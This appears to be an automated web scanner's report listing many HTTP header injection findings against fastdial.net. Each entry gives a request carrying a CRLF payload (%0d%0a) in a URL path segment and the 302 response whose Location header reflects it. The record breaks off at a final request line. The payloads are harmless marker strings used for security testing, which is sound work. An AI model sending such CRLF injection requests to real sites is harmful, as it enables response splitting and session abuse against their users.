HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:39 GMT Server: Apache Location: http://fastdial.net/static/images/common/b890d f65beb69505/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 5bd57%0d%0a99c3e5d7497 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/5bd57%0d%0a99c3e5d7497/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:59 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/5bd57 99c3e5d7497/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 2cf98%0d%0ab3f89a0be89 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/2cf98%0d%0ab3f89a0be89/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:17 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/2cf98 b3f89a0be89/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 82f8f%0d%0a653695efff1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /82f8f%0d%0a653695efff1/images/common/images/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:53:09 GMT Server: Apache Location: http://fastdial.net/82f8f 653695efff1/images/common/images/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 8b47e%0d%0a644c32e53e0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/8b47e%0d%0a644c32e53e0/common/images/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:53:20 GMT Server: Apache Location: http://fastdial.net/static/8b47e 644c32e53e0/common/images/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload e9669%0d%0af93c7b0db8f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/e9669%0d%0af93c7b0db8f/images/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:19 GMT Server: Apache Location: http://fastdial.net/static/images/e9669 f93c7b0db8f/images/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 6cd23%0d%0afd97a81be was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/6cd23%0d%0afd97a81be/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:34 GMT Server: Apache Location: http://fastdial.net/static/images/common/6cd23 fd97a81be/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 91451%0d%0acec409669a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/91451%0d%0acec409669a/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:47 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/91451 cec409669a/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 1213b%0d%0a7fcaf19985 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/images/1213b%0d%0a7fcaf19985/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:55:04 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/images/1213b 7fcaf19985/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload accdc%0d%0a4faed3d4dda was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /accdc%0d%0a4faed3d4dda/images/common/images/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:53:35 GMT Server: Apache Location: http://fastdial.net/accdc 4faed3d4dda/images/common/images/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 7af50%0d%0a4a82c80d0b0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/7af50%0d%0a4a82c80d0b0/common/images/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:21 GMT Server: Apache Location: http://fastdial.net/static/7af50 4a82c80d0b0/common/images/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 822d6%0d%0a5ad6a39ca1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/822d6%0d%0a5ad6a39ca1/images/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:35 GMT Server: Apache Location: http://fastdial.net/static/images/822d6 5ad6a39ca1/images/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload c2778%0d%0a02e59f9c8a5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/c2778%0d%0a02e59f9c8a5/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:48 GMT Server: Apache Location: http://fastdial.net/static/images/common/c2778 02e59f9c8a5/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 77a46%0d%0ae54ca6df6dc was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/77a46%0d%0ae54ca6df6dc/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:55:02 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/77a46 e54ca6df6dc/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 3f04b%0d%0aee3080ec05b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3f04b%0d%0aee3080ec05b/images/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:41 GMT Server: Apache Location: http://fastdial.net/3f04b ee3080ec05b/images/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 56895%0d%0af94c3baeeaf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/56895%0d%0af94c3baeeaf/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:56 GMT Server: Apache Location: http://fastdial.net/static/56895 f94c3baeeaf/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 258fc%0d%0afc870fd0166 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/258fc%0d%0afc870fd0166/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:54:07 GMT Server: Apache Location: http://fastdial.net/static/images/258fc fc870fd0166/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 84c78%0d%0adc7972e1fad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/84c78%0d%0adc7972e1fad/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:54:27 GMT Server: Apache Location: http://fastdial.net/static/images/common/84c78 dc7972e1fad/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 70666%0d%0a6da77c3160 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /70666%0d%0a6da77c3160/images/common/images/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:58 GMT Server: Apache Location: http://fastdial.net/70666 6da77c3160/images/common/images/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 4c7c4%0d%0a26cd100368a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/4c7c4%0d%0a26cd100368a/common/images/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:53:28 GMT Server: Apache Location: http://fastdial.net/static/4c7c4 26cd100368a/common/images/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload dae23%0d%0a390bd75be87 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/dae23%0d%0a390bd75be87/images/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:22 GMT Server: Apache Location: http://fastdial.net/static/images/dae23 390bd75be87/images/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 23b15%0d%0a768c48febe1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/23b15%0d%0a768c48febe1/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:35 GMT Server: Apache Location: http://fastdial.net/static/images/common/23b15 768c48febe1/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload ec06b%0d%0a799ef274a48 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/ec06b%0d%0a799ef274a48/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:54:49 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/ec06b 799ef274a48/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 214c5%0d%0a6d7458fcd93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /214c5%0d%0a6d7458fcd93/images/common/images/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:14 GMT Server: Apache Location: http://fastdial.net/214c5 6d7458fcd93/images/common/images/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload c2736%0d%0a8398a77bd07 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/c2736%0d%0a8398a77bd07/common/images/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:32 GMT Server: Apache Location: http://fastdial.net/static/c2736 8398a77bd07/common/images/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 3f763%0d%0a48a9b168cc4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/3f763%0d%0a48a9b168cc4/images/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:46 GMT Server: Apache Location: http://fastdial.net/static/images/3f763 48a9b168cc4/images/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 35e26%0d%0ad0f01da64bf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/35e26%0d%0ad0f01da64bf/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:57 GMT Server: Apache Location: http://fastdial.net/static/images/common/35e26 d0f01da64bf/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload ebbf0%0d%0afe2fffbee9f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/ebbf0%0d%0afe2fffbee9f/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:12 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/ebbf0 fe2fffbee9f/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 27bcc%0d%0a6fba0ba1bd4 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/styles/27bcc%0d%0a6fba0ba1bd4/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:29 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/styles/27bcc 6fba0ba1bd4/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 2e958%0d%0ab0819bb287f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2e958%0d%0ab0819bb287f/images/common/images/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:09 GMT Server: Apache Location: http://fastdial.net/2e958 b0819bb287f/images/common/images/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload e97af%0d%0a9e1331709da was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/e97af%0d%0a9e1331709da/common/images/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:24 GMT Server: Apache Location: http://fastdial.net/static/e97af 9e1331709da/common/images/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 448ec%0d%0afac944faf3d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/448ec%0d%0afac944faf3d/images/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:41 GMT Server: Apache Location: http://fastdial.net/static/images/448ec fac944faf3d/images/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 55fe5%0d%0a1b10539227d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/55fe5%0d%0a1b10539227d/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:52:55 GMT Server: Apache Location: http://fastdial.net/static/images/common/55fe5 1b10539227d/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload f2991%0d%0a52e60eae5ab was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/f2991%0d%0a52e60eae5ab/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:53:06 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/f2991 52e60eae5ab/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload a6438%0d%0ab29912a7bf7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /a6438%0d%0ab29912a7bf7/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:52:58 GMT Server: Apache Location: http://fastdial.net/a6438 b29912a7bf7/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload f47e2%0d%0a6362caef384 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/f47e2%0d%0a6362caef384/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:13 GMT Server: Apache Location: http://fastdial.net/static/f47e2 6362caef384/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload ea655%0d%0aa258ac4341d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/ea655%0d%0aa258ac4341d/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:29 GMT Server: Apache Location: http://fastdial.net/static/images/ea655 a258ac4341d/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload ac1a0%0d%0af1a98ed00f8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ac1a0%0d%0af1a98ed00f8/images/common/scripts/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:36 GMT Server: Apache Location: http://fastdial.net/ac1a0 f1a98ed00f8/images/common/scripts/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 12ce8%0d%0aa58894ca991 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
